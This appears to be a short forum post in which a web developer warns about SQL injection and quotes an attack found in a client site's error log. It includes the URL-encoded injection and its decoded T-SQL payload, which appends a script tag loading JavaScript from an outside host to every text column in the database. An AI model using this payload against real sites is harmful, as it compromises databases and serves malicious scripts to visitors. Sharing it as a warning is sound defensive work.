I doubt you would; but never overlook SQL Injection. Just caught this in an error from a client's website.
Luckily I patched the SQL Injection holes when I took over the website, also they've not been too clever as the whole injection string would have been enclosed in quotes before being sent to the DB as they have dumped it next to a string code!
the hex converts to:
And the JS seems to record the url of the hit site, I think, couldn't be bothered sorting through the obfuscated JS.
Anyway, shows the morals of http://www.bgsr.ru
Luckily I patched the SQL Injection holes when I took over the website, also they've not been too clever as the whole injection string would have been enclosed in quotes before being sent to the DB as they have dumped it next to a string code!
Code:
/browse.aspx?title=All%20Devore%20Shawls&product=Accessories&subtype=SHW;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(<<lots of hexidecimal here>>%20VARCHAR(4000));EXEC(@S);--
Code:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bgsr.ru/js.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Anyway, shows the morals of http://www.bgsr.ru
Comment